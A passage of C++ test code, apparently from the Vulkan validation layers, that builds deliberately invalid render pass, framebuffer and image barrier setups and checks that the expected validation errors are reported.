vk::DestroyRenderPass(m_device->device(), rp, nullptr); } TEST_F(VkLayerTest, ImageBarrierSubpassConflict) { TEST_DESCRIPTION("Check case where subpass index references different image from image barrier"); ASSERT_NO_FATAL_FAILURE(Init()); // Create RP/FB combo where subpass has incorrect index attachment, this is 2nd half of "VUID-vkCmdPipelineBarrier-image-02635" VkAttachmentDescription attach[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; // ref attachment points to wrong attachment index compared to img_barrier below VkAttachmentReference ref = {1, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &ref, nullptr, nullptr, 0, nullptr}, }; VkSubpassDependency dep = {0, 0, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_DEPENDENCY_BY_REGION_BIT}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 2, attach, 1, subpasses, 1, &dep}; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, nullptr, &rp); ASSERT_VK_SUCCESS(err); VkImageObj image(m_device); image.InitNoLayout(32, 32, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); VkImageView imageView = image.targetView(VK_FORMAT_R8G8B8A8_UNORM); VkImageObj image2(m_device); image2.InitNoLayout(32, 32, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); VkImageView imageView2 = image2.targetView(VK_FORMAT_R8G8B8A8_UNORM); // re-use imageView from start of test VkImageView iv_array[2] = {imageView, imageView2}; VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 2, iv_array, 32, 32, 1}; VkFramebuffer fb; err = vk::CreateFramebuffer(m_device->device(), &fbci, nullptr, &fb); ASSERT_VK_SUCCESS(err); VkRenderPassBeginInfo rpbi = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp, fb, {{ 0, 0, }, {32, 32}}, 0, nullptr}; VkImageMemoryBarrier img_barrier = {}; img_barrier.sType = VK_STRUCTURE_TYPE_IMAGE_MEMORY_BARRIER; img_barrier.srcAccessMask = VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT; img_barrier.dstAccessMask = VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT; img_barrier.oldLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; img_barrier.newLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; img_barrier.image = image.handle(); /* barrier references image from attachment index 0 */ img_barrier.srcQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED; img_barrier.dstQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED; img_barrier.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; img_barrier.subresourceRange.baseArrayLayer = 0; img_barrier.subresourceRange.baseMipLevel = 0; img_barrier.subresourceRange.layerCount = 1; img_barrier.subresourceRange.levelCount = 1; m_commandBuffer->begin(); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); 
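    // The lone subpass references attachment index 1, while the barrier below targets the image bound at
    // attachment index 0, so recording the pipeline barrier inside the render pass should trigger
    // "VUID-vkCmdPipelineBarrier-image-02635".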
    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdPipelineBarrier-image-02635");
    vk::CmdPipelineBarrier(m_commandBuffer->handle(), VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT,
                           VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_DEPENDENCY_BY_REGION_BIT, 0, nullptr, 0, nullptr, 1,
                           &img_barrier);
    m_errorMonitor->VerifyFound();

    vk::DestroyFramebuffer(m_device->device(), fb, nullptr);
    vk::DestroyRenderPass(m_device->device(), rp, nullptr);
}

TEST_F(VkLayerTest, RenderPassCreateAttachmentIndexOutOfRange) {
    SetTargetApiVersion(VK_API_VERSION_1_2);
    // Check for VK_KHR_get_physical_device_properties2
    if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) {
        m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME);
    }

    ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor));
    bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names);
    ASSERT_NO_FATAL_FAILURE(InitState());

    // There are no attachments, but refer to attachment 0.
    VkAttachmentReference ref = {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL};
    VkSubpassDescription subpasses[] = {
        {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &ref, nullptr, nullptr, 0, nullptr},
    };

    VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 1, subpasses, 0, nullptr};

    // "... must be less than the total number of attachments ..."
    TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported,
                         "VUID-VkRenderPassCreateInfo-attachment-00834", "VUID-VkRenderPassCreateInfo2-attachment-03051");
}

TEST_F(VkLayerTest, RenderPassCreateAttachmentReadOnlyButCleared) {
    // Check for VK_KHR_get_physical_device_properties2
    if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) {
        m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME);
    }

    ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor));
    bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names);
    bool maintenance2Supported = rp2Supported;

    // Check for VK_KHR_maintenance2
    if (!rp2Supported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE2_EXTENSION_NAME)) {
        m_device_extension_names.push_back(VK_KHR_MAINTENANCE2_EXTENSION_NAME);
        maintenance2Supported = true;
    }

    ASSERT_NO_FATAL_FAILURE(InitState());

    // VK_KHR_maintenance2 functionality is core in Vulkan 1.1 and later
    if (m_device->props.apiVersion >= VK_API_VERSION_1_1) {
        maintenance2Supported = true;
    }

    VkAttachmentDescription description = {0, VK_FORMAT_D32_SFLOAT_S8_UINT, VK_SAMPLE_COUNT_1_BIT,
                                           VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE,
                                           VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE,
                                           VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL};

    VkAttachmentReference depth_stencil_ref = {0, VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL};

    VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, &depth_stencil_ref, 0,
                                    nullptr};
    VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, &description, 1, &subpass, 0,
                                   nullptr};

    // VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL but depth cleared
    TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported,
                         "VUID-VkRenderPassCreateInfo-pAttachments-00836", "VUID-VkRenderPassCreateInfo2-pAttachments-02522");

    if (maintenance2Supported) {
        // VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL but depth cleared
        depth_stencil_ref.layout =
VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassCreateInfo-pAttachments-01566", nullptr); // VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL but depth cleared depth_stencil_ref.layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassCreateInfo-pAttachments-01567", nullptr); } } TEST_F(VkLayerTest, RenderPassCreateAttachmentMismatchingLayoutsColor) { TEST_DESCRIPTION("Attachment is used simultaneously as two color attachments with different layouts."); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); VkAttachmentDescription attach[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; VkAttachmentReference refs[] = { {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {0, VK_IMAGE_LAYOUT_GENERAL}, }; VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 2, refs, nullptr, nullptr, 0, nullptr}, }; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, attach, 1, subpasses, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "subpass 0 already uses attachment 0 with a different image layout", "subpass 0 already uses attachment 0 with a different image layout"); } TEST_F(VkLayerTest, RenderPassCreateAttachmentDescriptionInvalidFinalLayout) { TEST_DESCRIPTION("VkAttachmentDescription's finalLayout must not be UNDEFINED or PREINITIALIZED"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_SEPARATE_DEPTH_STENCIL_LAYOUTS_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_SEPARATE_DEPTH_STENCIL_LAYOUTS_EXTENSION_NAME); } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); auto separate_depth_stencil_layouts_features = lvl_init_struct<VkPhysicalDeviceSeparateDepthStencilLayoutsFeaturesKHR>(); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&separate_depth_stencil_layouts_features); if (vkGetPhysicalDeviceFeatures2KHR) { vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); } else { separate_depth_stencil_layouts_features.separateDepthStencilLayouts = VK_FALSE; } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, (vkGetPhysicalDeviceFeatures2KHR) ? 
&features2 : nullptr)); VkAttachmentDescription attach_desc = {}; attach_desc.format = VK_FORMAT_R8G8B8A8_UNORM; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; attach_desc.storeOp = VK_ATTACHMENT_STORE_OP_STORE; attach_desc.stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; attach_desc.stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; attach_desc.initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; attach_desc.finalLayout = VK_IMAGE_LAYOUT_UNDEFINED; VkAttachmentReference attach_ref = {}; attach_ref.attachment = 0; attach_ref.layout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; VkSubpassDescription subpass = {}; subpass.pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &attach_ref; VkRenderPassCreateInfo rpci = {}; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; rpci.attachmentCount = 1; rpci.pAttachments = &attach_desc; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-finalLayout-00843", "VUID-VkAttachmentDescription2-finalLayout-03061"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_PREINITIALIZED; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-finalLayout-00843", "VUID-VkAttachmentDescription2-finalLayout-03061"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; auto depth_format = FindSupportedDepthOnlyFormat(gpu()); auto stencil_format = FindSupportedStencilOnlyFormat(gpu()); auto depth_stencil_format = FindSupportedDepthStencilFormat(gpu()); if (separate_depth_stencil_layouts_features.separateDepthStencilLayouts) { attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03286", "VUID-VkAttachmentDescription2-format-03300"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03286", "VUID-VkAttachmentDescription2-format-03300"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03286", "VUID-VkAttachmentDescription2-format-03300"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03286", "VUID-VkAttachmentDescription2-format-03300"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03287", "VUID-VkAttachmentDescription2-format-03301"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03287", "VUID-VkAttachmentDescription2-format-03301"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03287", "VUID-VkAttachmentDescription2-format-03301"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; 
TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03287", "VUID-VkAttachmentDescription2-format-03301"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; if (depth_stencil_format) { attach_desc.format = depth_stencil_format; if (rp2Supported) { safe_VkRenderPassCreateInfo2 rpci2; attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescription2-format-03302"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescription2-format-03302"); } else { attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03288", "VUID-VkAttachmentDescription2-format-03302"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03288", "VUID-VkAttachmentDescription2-format-03302"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03288", "VUID-VkAttachmentDescription2-format-03302"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03288", "VUID-VkAttachmentDescription2-format-03302"); } attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; if (rp2Supported) { safe_VkRenderPassCreateInfo2 rpci2; attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescription2-format-03303"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescription2-format-03303"); } else { attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03289", "VUID-VkAttachmentDescription2-format-03303"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03289", "VUID-VkAttachmentDescription2-format-03303"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03289", "VUID-VkAttachmentDescription2-format-03303"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03289", "VUID-VkAttachmentDescription2-format-03303"); } attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } if (depth_format) { attach_desc.format = depth_format; attach_desc.initialLayout = 
VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03290", "VUID-VkAttachmentDescription2-format-03304"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03290", "VUID-VkAttachmentDescription2-format-03304"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03291", "VUID-VkAttachmentDescription2-format-03305"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03291", "VUID-VkAttachmentDescription2-format-03305"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } if (stencil_format) { attach_desc.format = stencil_format; attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03292", "VUID-VkAttachmentDescription2-format-03306"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03292", "VUID-VkAttachmentDescription2-format-03306"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03293", "VUID-VkAttachmentDescription2-format-03307"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03293", "VUID-VkAttachmentDescription2-format-03307"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } if (rp2Supported && depth_stencil_format) { attach_desc.format = depth_stencil_format; attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; auto attachment_description_stencil_layout = lvl_init_struct<VkAttachmentDescriptionStencilLayoutKHR>(); attachment_description_stencil_layout.stencilInitialLayout = VK_IMAGE_LAYOUT_GENERAL; attachment_description_stencil_layout.stencilFinalLayout = VK_IMAGE_LAYOUT_GENERAL; safe_VkRenderPassCreateInfo2 rpci2; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); rpci2.pAttachments[0].pNext = &attachment_description_stencil_layout; VkImageLayout forbidden_layouts[] = { VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR, VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL, }; auto forbidden_layouts_array_size = sizeof(forbidden_layouts) / sizeof(forbidden_layouts[0]); for (size_t i = 0; i < forbidden_layouts_array_size; ++i) { attachment_description_stencil_layout.stencilInitialLayout = forbidden_layouts[i]; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), 
"VUID-VkAttachmentDescriptionStencilLayout-stencilInitialLayout-03308"); } attachment_description_stencil_layout.stencilInitialLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; for (size_t i = 0; i < forbidden_layouts_array_size; ++i) { attachment_description_stencil_layout.stencilFinalLayout = forbidden_layouts[i]; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescriptionStencilLayout-stencilFinalLayout-03309"); } attachment_description_stencil_layout.stencilFinalLayout = VK_IMAGE_LAYOUT_UNDEFINED; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescriptionStencilLayout-stencilFinalLayout-03310"); attachment_description_stencil_layout.stencilFinalLayout = VK_IMAGE_LAYOUT_PREINITIALIZED; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescriptionStencilLayout-stencilFinalLayout-03310"); rpci2.pAttachments[0].pNext = nullptr; } } else { if (depth_format) { attach_desc.format = depth_format; attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03284", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03298"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03284", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03298"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03285", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03299"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03285", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03299"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } if (stencil_format) { attach_desc.format = stencil_format; attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03284", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03298"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03284", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03298"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03285", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03299"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03285", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03299"); 
